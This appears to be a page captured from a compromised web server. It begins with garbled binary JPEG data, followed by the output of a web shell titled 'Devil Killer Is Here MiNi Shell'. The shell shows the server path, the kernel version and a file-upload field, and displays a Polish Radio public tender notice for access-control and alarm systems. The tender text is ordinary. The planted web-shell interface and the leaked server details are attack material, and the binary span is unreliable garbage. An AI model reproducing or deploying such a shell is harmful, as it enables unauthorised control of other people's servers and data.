JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211208/0030619501-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> DOSTAWA I MONTAŻ URZĄDZEŃ DO MODERNIZACJI I ROZBUDOWY SYSTEMÓW ZABEZPIECZEŃ TECHNICZNYCH (SYSTEMU KONTROLI DOSTĘPU I SYSTEMU SYGNALIZACJI WŁAMANIA I NAPADU)” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Polskie Radio - Spółka Akcyjna</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 010420591</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">al. Niepodległości 77/85</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-977</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">226459621</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@polskieradio.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.prsa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> podmiot prawa publicznego </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> emisja programów radiowych </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> DOSTAWA I MONTAŻ URZĄDZEŃ DO MODERNIZACJI I ROZBUDOWY SYSTEMÓW ZABEZPIECZEŃ TECHNICZNYCH (SYSTEMU KONTROLI DOSTĘPU I SYSTEMU SYGNALIZACJI WŁAMANIA I NAPADU)” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ca845fd5-5830-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00306195</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://polskieradio.logintrade.net/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://polskieradio.logintrade.net/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ofertę składa się za pośrednictwem Platformy, wskazanej w Rozdziale I, zgodnie z Instrukcją, stanowiącą Załącznik nr 9 do SWZ. Ofertę składa się pod rygorem nieważności w formie elektronicznej (postać elektroniczna opatrzona kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym, albo podpisem osobistym. Ofertę, podmiotowe środki dowodowe, pełnomocnictwa oraz inne informacje, dokumenty i oświadczenia wymagane w niniejszym postępowaniu sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, zgodnie z pkt II Instrukcji korzystania z Platformy Przetargowej Polskiego Radia S.A, stanowiącej Załącznik nr 9 do SWZ. Oferta oraz pozostałe oświadczenia i dokumenty, dla których Zamawiający określił wzory w formie formularzy zamieszczonych w załącznikach do SWZ, powinny być sporządzone zgodnie z tymi wzorami, co do treści oraz opisu kolumn i wierszy. I.	Wymagania techniczno – sprzętowe umożliwiające pracę na Platformie<br/>1.	Stały dostęp do sieci Internet o gwarantowanej przepustowości (prędkość łącza internetowego) powyżej 500Kb/s.<br/>2.	Dopuszczalne przeglądarki internetowe: <br/>	Internet Explorer 10 i nowsze, Edge<br/>	Google Chrome<br/>	Mozilla Firefox<br/>	Opera<br/>3.	Pozostałe wymagania techniczne:<br/>	obsługa przez przeglądarkę protokołu XMLHttpRequest – ajax;<br/>	włączona obsługa JavaScript;<br/> zainstalowany Acrobat Reader;<br/>	zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update<br/>24 lub nowszy<br/>II. Informacje dotyczące dopuszczalnych formatów przesyłanych danych, formatów kwalifikowanego podpisu elektronicznego oraz kodowania i czasu odbioru danych<br/>1.	Format przesyłanych danych:<br/>1)	wielkość pojedynczego pliku do 50 MB, w przypadku przekazywania plików o większej objętości zalecana jest kompresja danych, albo podział pliku na mniejsze,<br/>2)	zalecany format: .pdf, przy czym Zamawiający dopuszcza inne formaty danych, wymienione <br/>w Załączniku nr 2 do Rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych <br/>i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych, np.: .doc, .docs, .rtf, .xps, .odt, przy czym wybór formatu nie może prowadzić do naruszenia zasad uczciwej konkurencji i równego traktowania wykonawców jednocześnie musi umożliwiać użycie kwalifikowanego podpisu elektronicznego lub podpisu osobistego lub zaufanego..</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Nr postępowania: BZP.B5.48.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest:<br/>dostawa i montaż urządzeń niezbędnych do rozbudowy i modernizacji systemów zabezpieczeń technicznych (systemu kontroli dostępu dalej zwany SKD i system sygnalizacji włamania i napadu dalej zwany SWiN) wraz z uruchomieniem w celu zapewnienia właściwej ochrony wybranych pomieszczeń. Wszystkie nowe urządzenia muszą współpracować z istniejącym w Polskim Radiu S.A. systemem kontroli dostępu ROGER RACS 5 oraz systemem sygnalizacji włamania i napadu opartym na centrali Satel Integra 265.<br/>2.	Szczegółowy opis przedmiotu zamówienia stanowi Załącznik nr 1 do SWZ. Pozostałe warunki wykonania zamówienia zawierają projektowane postanowienia umowy stanowiące Załącznik nr 8 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42961100-1 - System kontroli dostępu</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">35121700-5 - Systemy alarmowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">42 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryterium oceny ofert tj.: „cena oferty”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Uprawnienia do prowadzenia na obszarze Rzeczpospolitej Polskiej działalności gospodarczej w zakresie zabezpieczenia technicznego, polegającego na montażu elektronicznych urządzeń i systemów alarmowych, sygnalizujących zagrożenie chronionych osób i mienia, oraz eksploatacji, konserwacji i naprawach w miejscach ich zainstalowania, o którym mowa w art. 15 ust. 1 ustawy z dnia 22 sierpnia 1997 roku o ochronie osób i mienia (t. j. Dz. U. z 2020 roku, poz. 838 ze zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a.	aktualne na dzień składania ofert oświadczenie o niepodleganiu wykluczeniu z postępowania oraz spełnieniu warunku udziału – sporządzonego wg wzoru, stanowiącego Załącznik nr 5 do SWZ. Informacje zawarte w oświadczeniu stanowią potwierdzenie, że na dzień składania ofert Wykonawca nie podlega wykluczeniu oraz spełnia warunek udziału, o którym mowa w Rozdziale VIII pkt 2, tymczasowo zastępujące wymagane przez Zamawiającego podmiotowe środki dowodowe.<br/>b.	oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia z art. 117 ust. 4 PZP, sporządzonego wg wzoru stanowiącego Załącznik nr 7 do SWZ, z którego będzie wynikało, które prace przewidziane przedmiotem zamówienia wykonują poszczególni wykonawcy<br/>2. Zamawiający przed wyborem oferty najkorzystniejszej wezwie Wykonawcę, którego oferta została najwyżej oceniona, w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania do złożenia:<br/>a. aktualnego na dzień złożenia oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności z innym Wykonawcą, który złożył ofertę w niniejszym postępowania do tej samej grupy kapitałowej w rozumieniu ustawy o ochronie konkurencji i konsumentów, sporządzonego wg wzoru stanowiącego Załącznik nr 6 do SWZ, albo – w przypadku zaistnienia tego faktu – oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Aktualna na dzień złożenia koncesja – na potwierdzenie, spełnienia warunku udziału, o którym mowa w Rozdziale VIII pkt.2 SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 7.	Ofertę składa się na: formularzu oferty – Załącznik nr 2 do SWZ, formularzu cenowym – Załącznik nr 3 do SWZ, formularzu szczegółowy wykaz oferowanych urządzeń– Załącznik nr 4 do SWZ.<br/>8.	Do oferty w rozumieniu pkt 7 należy dołączyć:<br/>1)	oświadczenie, o którym mowa w Rozdziale X pkt. 1a SWZ – Załącznik nr 1 do SWZ;<br/>2)	w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie, o którym mowa w Rozdziale X pkt. 1b SWZ – Załącznik nr 7 do SWZ <br/>3)	dokument potwierdzający umocowanie do reprezentowania wykonawcy – odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru., <br/>4)	pełnomocnictwo – w przypadku, gdy wykonawca ustanawia pełnomocnika(ów) do reprezentowania go w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego oraz w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>2. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, w celu wykazania braku istnienia wobec nich podstaw do wykluczenia, o których mowa w Rozdziale IX pkt 1, oraz spełnienia warunku udziału w postępowaniu, o którym mowa w Rozdziale VIII pkt 2 - oświadczenie o niepodleganiu wykluczeniu z postępowania oraz spełnienie warunku udziału, o którym mowa w Rozdziale X pkt. 1a, składa każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>3.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek udziału dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej będzie spełniony jeżeli jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia będzie posiadał uprawnienia, o których mowa w Rozdziale VIII pkt. 2 i dokona montażu urządzeń do systemu kontroli dostępu i systemu sygnalizacji włamania i napadu.<br/>4.	W przypadku, gdy oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie oceniona najwyżej Zamawiający, przed wyborem oferty najkorzystniejszej, w terminie wskazanym w Rozdziale X pkt 2, wezwie wykonawców wspólnie ubiegający się o udzielenie zamówienia do złożenia:<br/>a.	przez każdego z tych wykonawców aktualnego na dzień złożenia oświadczenia, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności z innym wykonawcą, który złożył ofertę w niniejszym postępowania do tej samej grupy kapitałowej w rozumieniu ustawy o ochronie konkurencji i konsumentów, sporządzonego wg wzoru stanowiącego Załącznik nr 6 do SWZ, albo - w przypadku zaistnienie tego faktu - oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej oraz<br/>b.	przez co najmniej jednego z tych wykonawców do przedłożenia aktualnej na dzień złożenia koncesji – na potwierdzenie, spełnienia warunku udziału, o którym mowa w Rozdziale VIII pkt.2<br/>5.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są wraz z ofertą złożyć oświadczenie, o którym mowa w Rozdziale X pkt 1b, oraz oświadczenia wymienione w Rozdziale XIII pkt.9.1 – 9.3 SWZ.<br/>6.	Do wykonawców wspólnie ubiegających się o udzielenie zamówienia zastosowanie mają odpowiednie przepisy PZP oraz SWZ dotyczące wykonawców. <br/>7.	Wspólnicy spółki cywilnej są traktowani, jako wykonawcy składający ofertę wspólną. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zostały określone w projektowanych postanowieniach umowy, które stanowią załącznik nr 8 do SWZ w § 13<br/>1)	Zamawiający dopuszcza zmianę postanowień Umowy w stosunku do treści oferty Wykonawcy:<br/>1)	w zakresie sposobu i terminu spełnienia świadczenia, w szczególności ze względu na niedostępność na rynku Urządzeń, spowodowaną przedłużającymi się ponad 60 dni terminami dostaw, zaprzestaniem produkcji albo wycofaniem z rynku tych Urządzeń, w ten sposób, że dopuszczalne są zmiany Urządzeń o parametrach nie gorszych niż zaoferowane w ofercie i których cena nie przekracza 20% wartości pierwotnie zaoferowanej, a łącznie ta zmiana nie przekracza 30% wynagrodzenia o którym mowa w § 7 ust.1 – pod warunkiem udokumentowania przez Wykonawcę faktycznego istnienia ww. utrudnień;<br/>2)	w zakresie wynagrodzenia albo sposobu albo terminu spełnienia świadczenia, w szczególności ze względu na konieczność zrealizowania prac przy zastosowaniu innych rozwiązań niż wskazane w Załączniku nr 1 do Umowy w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu Umowy, które zostanie uzasadnione na piśmie przez jedną ze Stron powołującą się na konieczność zmiany i wykazanie okoliczności faktycznych lub prawnych determinujących zmianę - pod warunkiem, iż zmiany te nie spowodują podwyższenia wynagrodzenia o więcej niż 20 % pierwotnego wynagrodzenia brutto, o którym mowa w § 7 ust.1 Umowy<br/>3)	w zakresie zmiany wynagrodzenia albo sposobu albo terminu spełnienia świadczenia, w szczególności ze względu na konieczność zrealizowania przedmiotu Umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa - pod warunkiem, iż zmiany te nie spowodują podwyższenia wynagrodzenia o więcej niż 20 % pierwotnego wynagrodzenia brutto, o którym mowa w § 7 ust.1 umowy;<br/>w zakresie terminu, wskazanego w § 3 ust. 1– w przypadku, gdy stan epidemii oraz pandemia choroby COVID-19, wywołana wirusem SARS-CoV-2 lub ich następstwa skutkować będą czasowym zawieszeniem albo wstrzymaniem transportu lub produkcji Urządzeń lub ich elementów składowych, lub innymi utrudnieniami w transporcie lub produkcji – poprzez jego wydłużenie o przewidywany czas występowania utrudnień, zawieszenia bądź wstrzymania transportu, produkcji, nie dłuższy jednak niż kolejne 6 tygodni, liczone od upływu terminu wskazanego w § 3 ust. 1 pod warunkiem udokumentowania przez Wykonawcę faktycznego istnienia ww. utrudnień,<br/>8)	polegające na zmianie typu lub modelu Urządzeń – w przypadku, gdy stan epidemii oraz pandemia choroby COVID-19, wywołana wirusem SARS-CoV-2 lub ich następstwa skutkować będą czasowym zaprzestaniem jego produkcji, co zostanie potwierdzone oświadczeniem producenta oraz łącznym spełnieniem warunków wskazanych w § 13 ust.1 pkt.8 <br/>9)	w zakresie przedmiotu Umowy, poprzez zmianę zaoferowanego modelu Urządzenia - w przypadku braku dostępności Urządzenia na rynku europejskim, co zostanie udokumentowane oświadczeniem producenta o czasowym - minimum 2 tygodniowym - wstrzymaniu lub wycofaniu z produkcji oferowanego modelu i pod warunkiem, że model zamiennego Urządzenia będzie posiadał parametry techniczne i funkcjonalne spełniające wymogi określone w Załączniku nr 1 do Umowy i jednocześnie parametry te nie będą gorsze od wskazanych w Załączniku nr 2 do Umowy oraz pod warunkiem, że zmiana modelu Urządzeń w stosunku do zaoferowanego nie wpłynie na wysokość wynagrodzenia określonego w § 7 ust. 1<br/>10)	w przypadku wystąpienia w okresie realizacji Umowy, zdarzeń Okoliczności Siły Wyższej innych niż wskazane w ust. 1 poprzez dostosowanie jej postanowień i warunków wykonania przedmiotu Umowy w zakresie i celu umożliwiającym wykonane Umowy w warunkach będący następstwem wystąpienia Okoliczności Siły Wyższej<br/>11) w zakresie podwykonawców po spełnieniu wymogów § 13 ust.1 pkt 4-5<br/>12) w zakresie klauzul dot. ochrony danych osobowych <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-16 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę składa się za pośrednictwem Platformy dostepnej pod adresem: https://polskieradio.logintrade.net</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-16 12:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-14</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> INFORMACJE O FORMALNOŚCIACH, JAKIE POWINNY BYĆ DOPEŁNIONE PO WYBORZE OFERTY W CELU ZAWARCIA UMOWY W SPRAWIE ZAMÓWIENIA 